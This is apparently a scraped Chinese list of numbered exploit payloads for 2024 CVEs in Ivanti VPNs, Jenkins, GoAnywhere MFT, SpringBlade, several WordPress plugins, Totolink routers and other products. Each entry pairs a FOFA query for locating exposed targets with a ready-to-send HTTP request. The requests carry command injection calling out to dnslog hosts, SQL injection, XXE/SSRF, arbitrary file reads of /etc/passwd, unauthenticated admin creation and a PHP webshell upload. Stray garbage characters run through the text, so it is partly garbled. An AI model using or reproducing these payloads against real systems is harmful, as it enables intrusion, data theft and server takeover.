id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
5 F8 G {' S$ r0 T
$ {: Y& q+ l: ^- T" n: b2 R
! j0 m L0 _# }2 ]3 K- F2 w99. Ncast盈可视高清智能录播系统busiFacade RCE( [3 P& k8 y5 z, K7 M& j g
CVE-2024-0305
0 z4 \4 y% M! V' i! I- s: H8 o7 ZFOFA:app="Ncast-产品" && title=="高清智能录播系统"
% T! P8 ]0 ~% Q; X) xPOST /classes/common/busiFacade.php HTTP/1.16 z$ S! z. x/ q- i# k @ g
Host: 192.168.40.130:8080& Z! G9 Q$ d( v/ v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.09 d" N8 c4 U" |. f1 T% k
Connection: close, V$ c8 \; H/ ]' w( N
Content-Length: 154
, t q$ R P: V% q S4 s( d( hAccept: */*
; a7 Y9 x* h( }$ s1 nAccept-Encoding: gzip, deflate' X: W8 t' r3 b. H4 r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& l& X$ M4 ]# M' JContent-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Q% P7 ~) F3 h9 T2 l% z# f! {8 AX-Requested-With: XMLHttpRequest
4 G5 L- I0 j6 S% v; X% s+ d. B( i* ~& E6 g. g" G' g& ` T
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D! ^8 _* m+ ^3 S# X E( ^) B5 ]
5 `+ l" D% s. G2 M0 }/ s: B
6 e' @7 h: H( i: T, i0 R, l100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传* l# v& k6 S1 j& M+ Z
CVE-2024-0352
7 }. a% E- |1 PFOFA:icon_hash="874152924"
' r6 V+ q/ M! vPOST /api/file/formimage HTTP/1.1
" _% g8 Q) C6 n2 }9 M. n! GHost: 192.168.40.130
' a* D& { Z5 c4 O+ i& T( EUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36* c5 Q# t2 N- F5 c4 n3 M5 s5 }
Connection: close3 @- i0 t% m* K$ D6 \: ]2 A: t4 a' k
Content-Length: 201
2 i6 N; g% }1 }' G3 ?8 Z, GContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
3 k) w' [: T0 h# |; u# TAccept-Encoding: gzip
" X& o% ^5 D1 Q' n, A' J
; n! L, E" ^ F k------WebKitFormBoundarygcflwtei
( u: {' d/ K6 G; o2 f2 }Content-Disposition: form-data; name="file";filename="IE4MGP.php"" q3 q$ m$ x, T' a; y' R) V# J
Content-Type: application/x-php
% z$ F4 s! k$ [% ]
+ n: ?, ~& n$ b- y4 j2ayyhRXiAsKXL8olvF5s4qqyI2O$ q! n* h( h# V/ h! a0 t7 n. x
------WebKitFormBoundarygcflwtei--
/ J/ @2 a+ W! [8 I2 G2 I6 s4 E3 J: O$ x( G0 S" o
) r, o, f: m1 M8 d! `+ x101. ivanti policy secure-22.6命令注入/ Y- P/ N0 e9 B9 \9 {/ B' T, y6 A
CVE-2024-21887! Q! D4 R- w: Y0 M+ h
FOFA:body="welcome.cgi?p=logo", q1 M7 C! M4 z
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
: P8 {# F. e! Z8 B+ |) D8 p4 `Host: x.x.x.xx.x.x.x$ Q O; S/ r/ v; `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 g H% Z$ X4 }3 b
Connection: close
! i: }+ v. F& a# R& C& qAccept-Encoding: gzip
V' C" k! V* {+ J, T$ W4 q
5 K& u# a1 u: u9 v+ L% a
- O1 N' c- F- E; y' _9 ]102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行2 q/ A8 B8 u" B7 ?; x
CVE-2024-21893! a6 s, b& g" b4 A" e7 l
FOFA:body="welcome.cgi?p=logo"
8 d, g8 h2 a1 { K* S- Q( o' w+ kPOST /dana-ws/saml20.ws HTTP/1.1
8 s2 S- c3 O8 q" MHost: x.x.x.x; C+ _1 D4 ~: O* M4 c( _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ h1 I1 v0 E" t8 U+ Z0 r' Z
Connection: close: Z2 \; }) H% S5 }/ B; y( J
Content-Length: 7929 B/ m1 w! `8 c6 u3 {1 H8 {8 _
Accept-Encoding: gzip' u, m8 v6 ]! n# Y
[* m, T& a$ p6 R" `! h; k7 z# H3 ?<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
+ B/ F) P1 I' x8 D/ J6 ^* l6 v0 d0 @9 O0 h* Q6 _- x8 Q0 Q+ J
103. Ivanti Pulse Connect Secure VPN XXE# X) ]1 r+ }/ M
CVE-2024-22024
4 T0 s# C3 M- n! RFOFA:body="welcome.cgi?p=logo". p/ d' _, R* W4 f3 {" }
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
' g7 s/ L5 |4 ?0 n& hHost: 192.168.40.130:111
% @. a! v2 n, M: _8 M4 ZUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
1 J1 i" f$ ~) G5 K0 M/ sConnection: close4 {& }% o1 m" j; }
Content-Length: 2042 ^/ F! n- ~* C- H0 A1 e4 n
Content-Type: application/x-www-form-urlencoded' a j* O: t r5 b
Accept-Encoding: gzip. c* K( I( O5 V3 G
: e* m$ W& }2 O- B, y$ [( R! L, B" jSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
, D; e1 E- O' b& z1 W8 Z2 ?1 F1 ~2 v/ z% o1 Y
) _/ A [4 O! R6 f6 {' t9 e
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下6 X0 D* ^" O" ~
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>) U7 q# A; R6 ]0 F* p1 N7 _
0 f# D& n5 Q* | B3 t" K( \( G5 i, m( C2 O" R
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
! `, I/ A+ v; ^# v* k1 C9 K# TCVE-2024-05691 M0 I2 T0 l# A* G* v1 x o1 J
FOFA:title="TOTOLINK") V% }" d" }1 W
POST /cgi-bin/cstecgi.cgi HTTP/1.1
1 E! t% L5 a' }9 D+ p; o% Q0 h1 WHost:192.168.0.14 r/ b2 N2 y: z' R8 c
Content-Length:41% u3 c; T7 ?9 L- v5 k n' z+ F% b
Accept:application/json,text/javascript,*/*;q=0.01
( h. k; u2 h) D6 l/ L: d, f. FX-Requested-with: XMLHttpRequest9 C' h5 a5 F- {! I, @- D
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.366 b: u& ]; {9 V# J" R! B
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
; \) P J* `* O+ W% g" ~* K4 VOrigin: http://192.168.0.1
6 X8 v( _; X( y9 i) _# m- F2 M, CReferer: http://192.168.0.1/advance/index.html?time=1671152380564$ Y7 r/ r9 ?( D$ L* C% B+ z* i
Accept-Encoding:gzip,deflate
. h* @, U) z" F- m. pAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.72 G+ \3 z0 {3 F; p3 F
Connection:close* l4 G( x* B/ K- Q& @1 \; g
5 R0 F4 ~% f4 x
{
2 C* T; I: t* ~2 j"topicurl":"getSysStatusCfg",2 M0 Y' F" n8 w0 q' e
"token":""% u0 L, e" y! j; r
}5 [7 I2 r& [ J' I" ^ X. \) Y
& A" g4 n" Y9 |& x& I+ i105. SpringBlade v3.2.0 export-user SQL 注入
) F y! x- j( A" c$ Q* [FOFA:body="https://bladex.vip"5 {! _: n* D2 |; d+ E' J9 r
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=10 V# F4 j: \( [
/ k/ I7 D8 n M( ~106. SpringBlade dict-biz/list SQL 注入
! ~/ L5 p7 G% N9 f, nFOFA:body="Saber 将不能正常工作"
4 X, C" P2 Y# V, y8 BGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
+ p, Z6 H8 R$ G; o9 r5 `6 ^: }5 QHost: your-ip5 }: e [/ Z& J; h: S, N1 x i* c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- q6 @% I& m ?2 I2 P
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A/ ~# ^- s8 `' [8 O- r0 S$ U
Accept-Encoding: gzip, deflate+ z6 K _2 e' A; K" G; u O1 ~3 v% P4 q
Accept-Language: zh-CN,zh;q=0.9
; j4 }0 _% d+ q; AConnection: close' F$ B( e5 B1 T& P5 _
" A$ D9 [% r; K4 A _6 {) A) [
7 ~2 k! N4 S; R8 ]4 c/ e* ~0 v107. SpringBlade tenant/list SQL 注入2 s0 i7 m1 P4 w; P* x4 E4 t
FOFA:body="https://bladex.vip"8 X, c3 H% J* z
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
, f% C+ o* a7 k& hHost: your-ip
# K D, D Z/ c2 O% B* t* M3 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* C7 j" n2 X3 e3 n% j6 ]. mBlade-Auth:替换为自己的! Y' z/ Q! W% I% I6 G
Connection: close
1 X$ b; y2 F1 A0 e5 V1 U% B! ]8 K/ G* ~- M) R: _! g
+ \+ P( J* @( o# S- n108. D-Tale 3.9.0 SSRF; j0 O0 |# z9 k
CVE-2024-21642
9 T/ a/ j' `# t P6 }+ TFOFA:"dtale/static/images/favicon.png"
k/ m; h7 m8 e" M) c dGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1* G# e ~" m9 K" F; ?( P3 M/ y
Host: your-ip
. t! Z9 d7 o* `/ ]7 p3 _/ l& \7 vAccept: application/json, text/plain, */*) w E2 x3 `0 y0 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" ^3 [1 }! u; K9 m
Accept-Encoding: gzip, deflate: t( p, ~7 }! u+ g: N
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8- g: ~2 s7 w o% Y9 s
Connection: close
! v! O! v% ^$ a* h7 w
z% ~, S/ E, G+ O9 A& J& s% @/ h$ p& W# u
109. Jenkins CLI 任意文件读取
1 R3 ~7 F9 b8 A F' E! F9 r2 JCVE-2024-238974 `7 p, z: d( ~0 ]
FOFA:header="X-Jenkins"
' Q" d* |3 f/ _: T& aPOST /cli?remoting=false HTTP/1.1
9 J: t3 E1 q. t' sHost:
5 m& T% R0 _, m* J$ ?+ m& G4 fContent-type: application/octet-stream0 Z+ U7 y) D. i: e
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e923 a# \4 B) Q0 Q; M" V
Side: upload
7 r+ @! c8 t+ Y1 t4 zConnection: keep-alive
7 a8 D @' m) w% r" qContent-Length: 163
- {0 h A/ J5 R2 W- }) s
- j6 l1 {* f6 v: Gb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03', I2 P( L' s1 ?; w
0 K. b/ u7 i5 H" a- c
" X% f ~, k8 v/ h4 FPOST /cli?remoting=false HTTP/1.1' J H' @% Y; B: u
Host:& {- e: M; [" p% N" X
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92( K2 b3 o+ r" x7 v+ M* y& R) N. F
download
2 y, y0 u8 F+ `- OContent-Type: application/x-www-form-urlencoded
Q$ m, w0 }3 a$ mContent-Length: 0: v# T& y8 H) _$ e& F3 \! y
" e4 J7 D% A$ t
# P$ n: @- C9 @+ _1 S7 _( G3 o# @ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5 |% `4 L5 h( M- w$ t9 Z2 W2 Ojava -jar jenkins-cli.jar help
1 e5 ^0 b4 R; y; N- W[COMMAND]
9 h* R9 N0 B) _5 Y- n2 q6 K" ]Lists all the available commands or a detailed description of single command.
$ C0 Y+ g+ r: i9 }1 o7 m COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash). d- o' O) H4 g, N; t
6 [4 q. D0 M+ z. v+ R' {2 f" v8 P( L, k
; z3 e1 B% t3 r6 {+ l2 |
110. Goanywhere MFT 未授权创建管理员" H: q/ b: t; g# }! `5 ^' H
CVE-2024-0204
, n' H8 c" ^, P3 C5 R0 J/ RFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
; [: [. ~ i: T+ ]+ B. l2 [GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.19 T8 h. U$ T2 I( e/ u
Host: 192.168.40.130:80004 u- Y! ^2 k, R1 v* E7 `
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
6 _: Q9 C4 p) L% J/ v- ~% F' _Connection: close5 m: c _* e) k. A2 v
Accept: */** y& p/ c0 m* }/ E
Accept-Language: en8 J& M8 e0 q0 L; c. t
Accept-Encoding: gzip$ o7 j. E6 {( I
% s/ U7 R5 |% d& M0 n7 r
8 Z2 B, t& Z }, q9 a8 j
111. WordPress Plugin HTML5 Video Player SQL注入7 t9 a7 }+ p* p6 T, u& }
CVE-2024-10612 ?& |* d3 K' q
FOFA:"wordpress" && body="html5-video-player"
% t! W& g) P, m4 w5 f/ k: ^GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
5 P5 ]) L7 y1 v$ \; w. {! nHost: 192.168.40.130:112
# }/ ^/ e- k- p- ^User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 \5 `# E# c4 Y# j* `, A
Connection: close) Y P6 |0 a9 }
Accept: */*
. P) [( A& m& C# M, g. }! j0 U7 XAccept-Language: en
- J; ?3 ?# w! h! R. {. A0 Z) LAccept-Encoding: gzip
7 ~: o6 b* r' c' y2 g, j6 ]% F5 g: }$ D% U6 d
& c) }: C5 m6 q2 N$ [7 J. @112. WordPress Plugin NotificationX SQL 注入
# k8 r- S5 h: [6 g) BCVE-2024-1698
. H4 ]3 q% P7 bFOFA:body="/wp-content/plugins/notificationx"
- D: q H0 g$ \5 M. }# {POST /wp-json/notificationx/v1/analytics HTTP/1.1
; Z8 {# S# P4 xHost: {{Hostname}}
; f. z1 J5 q3 W. p% M7 V/ UContent-Type: application/json
6 L: ?7 c3 ]& ~' ?3 k' ^. R
- C# P9 z Q0 j6 c2 Y) o& C' p% o1 R% t{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
' y; B8 h( F" O4 c4 X& S+ Z6 \( g& W7 L/ l. X( A
" g8 ]( {2 {8 }( m% ?
113. WordPress Automatic 插件任意文件下载和SSRF
2 p( p8 i- e jCVE-2024-27954/ o" Z: ]5 `) E2 m( b/ F }* s# }
FOFA:"/wp-content/plugins/wp-automatic"
. z* ]! y. V0 `' K( e* ]- D$ `GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
5 J- r7 M1 v7 g8 k* l! n$ ~7 nHost: x.x.x.x7 L* b" F) o2 A
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36$ _# G/ Q* y: U! K
Connection: close
3 D$ N6 D% \, YAccept: */*
3 y9 B' _+ K0 o- U) VAccept-Language: en
. [, t. A; w: m# m" p6 @; uAccept-Encoding: gzip/ v5 b2 q& n" O, D! _6 B' S/ |8 K
4 o' [/ R4 ^, {3 A. X/ ?$ Z1 H
9 [5 k# B( D5 @6 e$ h$ {6 u
114. WordPress MasterStudy LMS插件 SQL注入' A( s- k9 C7 m; M1 ^
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
, }1 v' C! X) j( A B# BGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
[0 l' G/ V8 P K# BHost: your-ip
* J4 j/ F4 M7 KUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
: c# s8 ~/ x/ dAccept-Charset: utf-8( ^: c% T( e$ F# f$ D
Accept-Encoding: gzip, deflate; w) L3 t0 _$ W) \! E* I% y7 o
Connection: close! U G O4 W8 w9 S8 z, Y- B) H
7 H% j3 } k2 T( g: k: n) ?' B. ~, s9 M% @
115. WordPress Bricks Builder <= 1.9.6 RCE3 b! Q4 e% U" J+ c; n4 y" f
CVE-2024-25600
' y4 X! p) i1 J( P( ?9 gFOFA: body="/wp-content/themes/bricks/"+ B- i7 ]1 ~0 K2 O* x# y
第一步,获取网站的nonce值
, [8 l' Y7 T( i9 n+ nGET / HTTP/1.1
4 G% L k2 O3 rHost: x.x.x.x
% c) U1 A; ^! k3 `/ f4 J+ G6 r9 IUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36; P# x6 U; ~" G2 H( `
Connection: close
1 a. c8 @6 y. h3 t: OAccept-Encoding: gzip. T) V4 h4 P% t
' t( \* @* ?! }' w" ~- \ g' j9 F5 f/ e4 z+ q+ E; F, L
第二步替换nonce值,执行命令( y% D# l O8 i$ ~3 N: Y
POST /wp-json/bricks/v1/render_element HTTP/1.1
* S# j2 H9 Z" ~+ [" [5 E8 y& R. `: YHost: x.x.x.x. {" a( r. z3 j. x& ^+ [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% `1 C- [6 {3 U( @! P# j- QConnection: close. p9 }* z3 ~4 \/ E* a( V
Content-Length: 356
/ P$ ~8 g4 A5 h& W3 |Content-Type: application/json
6 k2 {: Z* W+ T1 d0 q5 eAccept-Encoding: gzip! Q7 e& O$ f2 W
5 h0 [3 \ G- j4 e1 s* w5 b) C! y{
+ w: Z& D( Z |& r& H8 D" s6 r3 ^5 _"postId": "1",; y( O& i% y+ Q i0 n: Y9 J
"nonce": "第一步获得的值",
' Q; C- b( B# Z7 r3 t" D# D "element": {
$ C" @! {$ A: n3 C- e "name": "container",
) A) q1 `, U: d5 U* |! w, x "settings": {
$ p: `+ W' g! @+ q. M, ^ "hasLoop": "true",
, p- ], E5 {. j. g. m9 n "query": {
# t+ `6 S5 c. O7 |( p5 I% ] "useQueryEditor": true,
4 @" q- o+ z" \) k3 G$ x "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
7 `+ }8 E1 Q3 g "objectType": "post"* u H) J: r: i& b
}
8 P5 i ]( V, S6 l, `7 h }
$ U6 f& O7 Z, v1 Y5 B }2 p) V9 G0 u. n* F) H, B
}& }; P; L, @7 F
) C8 S A: ]4 w/ S% _9 {; P# c' ]9 A3 N0 d' {0 v, g
116. wordpress js-support-ticket文件上传
R7 a4 I B8 q1 v6 qFOFA:body="wp-content/plugins/js-support-ticket"* ?/ W/ d7 ]* R; y% Q
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.11 R, j- @2 I4 Y: x/ o
Host:/ s( @# u0 i- G- ` M% }6 \ U
Content-Type: multipart/form-data; boundary=--------7670991712 H# m% U, w: L8 w4 g8 f
User-Agent: Mozilla/5.0
0 O1 b3 }! a/ N" A0 c% t3 B* n. a+ e8 p' \4 S7 B9 ~$ ^
----------767099171
& B' B# b g% \: J4 {Content-Disposition: form-data; name="action"
7 ~3 C3 \* q$ Cconfiguration_saveconfiguration
9 f# K1 `4 h3 p p1 q; ~+ k/ Y2 g6 Y; T----------767099171
5 j" p8 \3 W* X8 g, @' x4 DContent-Disposition: form-data; name="form_request"
1 K+ [5 k" J8 s# N) P; Mjssupportticket
2 ~, c2 j# n1 E3 S" `0 A----------767099171* r. I- r! n' ]: g: I! V5 t6 h0 r
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
! f6 }0 q; }2 H$ e. ^# h# {$ Z6 p6 lContent-Type: image/png
. Y2 Z3 T2 m7 o# T3 W----------767099171--
1 h5 ?% g8 _) |0 }/ _: }5 K2 w! K$ M6 X6 V# B7 K
$ o9 E0 ` h! J117. WordPress LayerSlider插件SQL注入( ^& g2 X6 J; W6 N* r
version:7.9.11 – 7.10.0/ K) v' }' C/ C, |8 p# E
FOFA:body="/wp-content/plugins/LayerSlider/"
# o. ^, T: W1 x* M8 UGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1& M& B. |" q4 A2 s" Y
Host: your-ip
$ t8 z C6 i- f1 }! Z" u( AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
3 n$ r5 e. @, B- N3 j- ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 v0 J/ \+ S7 ^7 A) HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' n" s* o1 B! [' J
Accept-Encoding: gzip, deflate, br- V6 o+ ^! c, T! g3 T
Connection: close9 z# p. P! C* @- ]9 g% G6 Y
Upgrade-Insecure-Requests: 1" S# i2 W9 j3 J& ?# p
, m4 |2 _$ B# @# Z$ d( u; t- f! S4 n" u' p9 p* O
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
F' m; y4 n" r# ICVE-2024-0939
9 O% a0 L, c0 R' g! vFOFA:title="Smart管理平台"
0 T7 ?) w1 J! x9 E2 l% ?+ oPOST /Tool/uploadfile.php? HTTP/1.1# b$ a6 N1 w* e8 |1 K
Host: 192.168.40.130:8443* \6 P2 P2 D F% J+ z! T& ?
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8) c! s% |4 p: D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0; \1 Y' f* q. X" c3 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ i+ Q& H' i) n m* u, m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; m* U# r1 u& C! e5 P& p, w xAccept-Encoding: gzip, deflate
# A- f" k w$ iContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
* Z4 z9 x( E4 S2 D6 _0 x1 E; WContent-Length: 405" H( [" v: ?" V9 |/ ^" F
Origin: https://192.168.40.130:8443) \! c' @' `) K0 o3 }3 I; o
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
" r) E( s1 ]0 K# SUpgrade-Insecure-Requests: 1. V( y5 |" A2 x- g( L
Sec-Fetch-Dest: document6 [* f5 [, ]' X, L/ X6 G
Sec-Fetch-Mode: navigate
: Q9 d( b) m$ ?5 wSec-Fetch-Site: same-origin+ j+ D( O' t) u( W
Sec-Fetch-User: ?1
& O! t+ B9 f8 u/ B8 P2 h% f4 q8 wTe: trailers5 h2 m; v7 c& j# v
Connection: close3 }% E. _& h5 k% g% ^
9 @) |" W# f6 A-----------------------------13979701222747646634037182887$ ~3 t: a- E9 ?* \; I4 J+ m6 L: `8 e
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
; {6 X x, P2 j) ~Content-Type: application/octet-stream
* g2 N* x5 ~* x4 v2 o/ J% B1 H
' G8 ]# H f. x8 ]/ t<?php
4 `5 R, o: \) q. K6 Msystem($_POST["passwd"]);6 F- {9 |: c# Q" @2 k7 C
?>
3 n9 ]4 l. t& h+ P9 Y' d4 x' H* Z-----------------------------13979701222747646634037182887
+ k& ?$ C1 }: p; a1 dContent-Disposition: form-data; name="txt_path"
- ^( m' h, Q9 _/ I9 }% G' t1 s# H7 \& Z& S: Q: K9 _
/home/src.php' U2 h( \" s# O( {/ g! f
-----------------------------13979701222747646634037182887--) L/ w$ ?+ Z( [$ d, \
' ~$ T* |/ d4 v x- Y, A |7 I: R7 K5 R0 ~
访问/home/src.php
" @' p+ y) u. I; z5 t
; S* e, Q; v& X9 d$ T" v! J3 A; e {1 e119. 北京百绰智能S20后台sysmanageajax.php sql注入
+ d4 h# {. Q! F3 q3 s3 ?/ h4 s$ yCVE-2024-1254
4 l3 m6 ]4 X/ y% z ^$ DFOFA:title="Smart管理平台"4 a4 ~ S+ ^: i
先登录进入系统,默认账号密码为admin/admin" l3 W- q* Z8 @' `3 n
POST /sysmanage/sysmanageajax.php HTTP/1.11# n' r, e" [) \7 B( _
Host: x.x.x.x8 \. f5 z D0 M6 o. c
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee. j3 o, N% v% a: E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0& w5 |0 f' s& V, E) k
Accept: */*
& G! T' w$ a8 }% R: d5 q7 r6 }/ \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! R# Q1 H! N4 |; ]! ?; aAccept-Encoding: gzip, deflate
1 G2 g( T3 k7 I$ ^/ w! ]Content-Type: application/x-www-form-urlencoded;
0 o1 I, i4 Z' ^; Q2 _' x% V1 WContent-Length: 109
/ i1 E e, @7 V5 NOrigin: https://58.18.133.60:8443
9 W. d& M+ |: M% b+ b8 z$ JReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
: L* Y) T \) w vSec-Fetch-Dest: empty
' k5 d$ N! o' B- V! FSec-Fetch-Mode: cors
8 y. Q, a9 B# C4 nSec-Fetch-Site: same-origin" l- y& e% ?& }: ]
X-Forwarded-For: 1.1.1.1
! z0 C* w/ Z9 XX-Originating-Ip: 1.1.1.1: }' ^. N( ~6 e/ d Q
X-Remote-Ip: 1.1.1.1
" r: y) I- [. R* n2 M0 d9 kX-Remote-Addr: 1.1.1.1
; Q- F( j2 M) }7 M& j7 }" ]* z0 uTe: trailers: d5 R& L, b: w! M% p8 d) ]
Connection: close- w/ E- b8 ^0 S4 [
3 g6 S3 h5 g5 O9 ~
